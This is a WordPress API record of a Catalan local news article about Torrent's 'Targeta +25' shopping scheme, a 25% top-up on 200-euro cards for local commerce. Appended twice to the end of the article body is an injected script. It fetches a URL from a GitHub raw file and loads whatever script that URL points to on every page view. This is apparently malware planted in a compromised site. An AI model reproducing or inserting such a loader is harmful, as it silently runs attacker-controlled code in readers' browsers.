{"id":76131,"date":"2025-01-17T10:14:55","date_gmt":"2025-01-17T09:14:55","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/la-tarjeta-25-vuelve-a-torrent-inyectando-en-los-comercios-de-la-ciudad-un-total-de-500-000e\/"},"modified":"2025-01-27T01:56:06","modified_gmt":"2025-01-27T00:56:06","slug":"la-tarjeta-25-vuelve-a-torrent-inyectando-en-los-comercios-de-la-ciudad-un-total-de-500-000e","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/comercio-mercados-y-empleo-ca\/la-tarjeta-25-vuelve-a-torrent-inyectando-en-los-comercios-de-la-ciudad-un-total-de-500-000e\/","title":{"rendered":"La \u2018Targeta +25\u2019 torna a Torrent injectant en els comer\u00e7os de la ciutat un total de 500.000\u20ac"},"content":{"rendered":"\n<p><strong>La compra de les targetes estar\u00e0 disponible a partir del dilluns 20 de gener a les 10.00 hores, tant a trav\u00e9s de la p\u00e0gina web d&#8217;IDEA&#8217;T com presencialment en les seues oficines<\/strong><\/p>\n\n\n\n<p>Un any m\u00e9s, l&#8217;Ajuntament de Torrent i l&#8217;empresa municipal IDEA&#8217;T posen en marxa la \u2018Targeta +25\u2019, una iniciativa dissenyada per a fomentar les compres en els establiments de la ciutat i donar un impuls al comer\u00e7 i l&#8217;hostaleria local. A m\u00e9s, esta mesura busca premiar als clients amb un 25% extra sobre l&#8217;import invertit.<\/p>\n\n\n\n<p>Els ciutadans podran adquirir targetes per un valor de 200 euros, als quals IDEA&#8217;T sumar\u00e0 un 25%, resultant en un saldo final de 250 euros per targeta. El pressupost destinat a esta edici\u00f3 ascendix a 100.000 euros, la qual cosa permetr\u00e0 mobilitzar un total de 500.000 euros en el comer\u00e7 local si s&#8217;esgoten totes les targetes. D&#8217;este muntant, 400.000 euros seran aportats pels clients.<\/p>\n\n\n\n<p><strong>La compra de les targetes estar\u00e0 disponible a partir del dilluns 20 de gener a les 10.00 hores,<\/strong> <\/p>\n\n\n\n<p>tant a trav\u00e9s de la p\u00e0gina web d&#8217;IDEA&#8217;T com presencialment en les seues oficines. Cada persona podr\u00e0 adquirir una \u00fanica targeta, el saldo de la qual podr\u00e0 utilitzar-se en els establiments adherits fins al final de 2025.<\/p>\n\n\n\n<p>En paraules de l&#8217;alcaldessa de Torrent, Amparo Folgado, <strong>\u201cel comer\u00e7 de Torrent genera ocupaci\u00f3, riquesa i destaca per la qualitat i proximitat amb el client, per la qual cosa hem de continuar secundant-los en una \u00e8poca clau de l&#8217;any, contribuint a la seua estabilitat i creixement\u201d.<\/strong><\/p>\n\n\n\n<p>Este programa subratlla l&#8217;aposta de l&#8217;Ajuntament per enfortir els xicotets comer\u00e7os, considerats el cor del teixit empresarial de Torrent. En incentivar compres m\u00e9s xicotetes i recurrents, es promou una economia local m\u00e9s s\u00f2lida. A m\u00e9s, es reafirma el comprom\u00eds d&#8217;avaluar i ajustar la iniciativa per a maximitzar el seu impacte.<\/p>\n\n\n\n<p>La regidora de Comer\u00e7 i Mercats, i responsable d&#8217;IDEA&#8217;T, Sandra Fas, ha destacat la import\u00e0ncia d&#8217;esta iniciativa: <strong>\u201cHem decidit llan\u00e7ar esta nova edici\u00f3 de la \u2018Targeta +25\u2019 en un moment en qu\u00e8 els negocis experimenten una baixada de vendes despr\u00e9s de les compres nadalenques, per la qual cosa ser\u00e0 de gran utilitat tant per als nostres negocis com per als consumidors davant la temuda costa de gener\u201d.<\/strong><\/p>\n\n\n\n<p>L&#8217;Ajuntament tamb\u00e9 busca amb esta iniciativa refor\u00e7ar el vincle entre els consumidors i els establiments de proximitat. Sandra Fas ha subratllat que \u00a0<strong>\u201cquan comprem en el comer\u00e7 de Torrent, l&#8217;impacte es multiplica. No sols ajudem als amos i empleats de les botigues, sin\u00f3 que tamb\u00e9 contribu\u00efm a una economia circular que beneficia a tot el municipi\u201d.<\/strong><\/p>\n\n\n\n<p>Amb mesures com la \u2018Targeta +25\u2019, Torrent refor\u00e7a el seu comprom\u00eds amb el desenrotllament sostenible del comer\u00e7 local i la recuperaci\u00f3 despr\u00e9s de la DANA. Este programa no sols representa un impuls econ\u00f2mic, sin\u00f3 tamb\u00e9 un gest de suport als ve\u00efns i comerciants que formen part de la identitat de Torrent.<\/p>\n\n\n\n<p>A m\u00e9s, esta edici\u00f3 reflectix una estrat\u00e8gia a llarg termini per a consolidar als xicotets negocis com a pilar fonamental del desenrotllament de Torrent, assegurant que les mesures econ\u00f2miques tinguen un impacte durador i m\u00e9s positiu.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"748\" height=\"748\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/tarjeta-25.jpg\" alt=\"\" class=\"wp-image-76127\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/tarjeta-25.jpg 748w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/tarjeta-25-300x300.jpg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/tarjeta-25-150x150.jpg 150w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/tarjeta-25-700x700.jpg 700w\" sizes=\"(max-width: 748px) 100vw, 748px\" \/><\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>La compra de les targetes estar\u00e0 disponible a partir del dilluns 20 de gener a les 10.00 hores, tant a trav\u00e9s de la p\u00e0gina web d&#8217;IDEA&#8217;T com presencialment en les seues oficines Un any m\u00e9s, l&#8217;Ajuntament de Torrent i l&#8217;empresa municipal IDEA&#8217;T posen en marxa la \u2018Targeta +25\u2019, una iniciativa dissenyada per a fomentar les [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":76128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1205],"tags":[],"class_list":["post-76131","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-comercio-mercados-y-empleo-ca"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76131","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=76131"}],"version-history":[{"count":4,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76131\/revisions"}],"predecessor-version":[{"id":76529,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76131\/revisions\/76529"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/76128"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=76131"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=76131"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=76131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}